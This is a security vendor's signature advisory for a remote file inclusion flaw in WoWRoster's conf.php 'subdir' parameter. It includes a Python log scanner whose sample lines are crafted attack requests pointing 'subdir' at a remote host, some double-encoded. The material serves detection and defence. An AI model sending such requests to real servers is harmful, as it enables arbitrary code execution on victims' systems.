WoW.Roster.subdir.Parameter.Handling.File.Inclusion

Description

This indicates an attempt to exploit a PHP remote file inclusion vulnerability in WoWRoster (aka World of Warcraft Roster).
The vulnerability in "conf.php" may allow remote attackers to execute arbitrary PHP code via a URL in the "subdir" parameter.
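
For defenders reviewing web server logs for this activity, the following added example (not part of the original advisory or of WoWRoster) flags requests to "conf.php" whose "subdir" query parameter carries a URL. It assumes combined-format access logs and sees query strings only, not POST bodies; the sample lines, hosts and paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme (http://, ftp://, ...) or a bare //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_subdir_inclusion_attempt(log_line):
    """True if the line requests conf.php with a URL in the 'subdir' parameter."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/conf.php"):
        return False
    # parse_qsl decodes one layer; fully_unquote handles double encoding.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "subdir" and REMOTE_RE.match(fully_unquote(value)):
            return True
    return False

# Constructed sample log lines (documentation IPs, .invalid hosts, assumed paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2019:10:01:22 +0000] "GET /roster/conf.php?subdir=http://files.example.invalid/inc HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Jul/2019:10:01:25 +0000] "GET /wow/conf.php?subdir=http%253A%252F%252Ffiles.example.invalid%252Finc HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Jul/2019:10:02:00 +0000] "GET /roster/conf.php?subdir=addons/ HTTP/1.1" 200 2048',
    '198.51.100.4 - - [12/Jul/2019:10:02:03 +0000] "GET /roster/index.php?subdir=http://files.example.invalid/inc HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return the log lines that match the pattern described above."""
    return [line for line in lines if is_subdir_inclusion_attempt(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("SUSPECT:", hit)
```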

Affected Products

WoW Roster 1.5.1
WoW Roster 1.5

Impact

System Compromise: Arbitrary PHP code execution.

Recommended Actions

Currently we are not aware of any official vendor-supplied patch for this issue.
WoWRoster Web site: http://www.wowroster.net/

Coverage

IPS (Regular DB)
IPS (Extended DB)

Version Updates

Date Version Detail
2019-07-12 14.648 Sig Added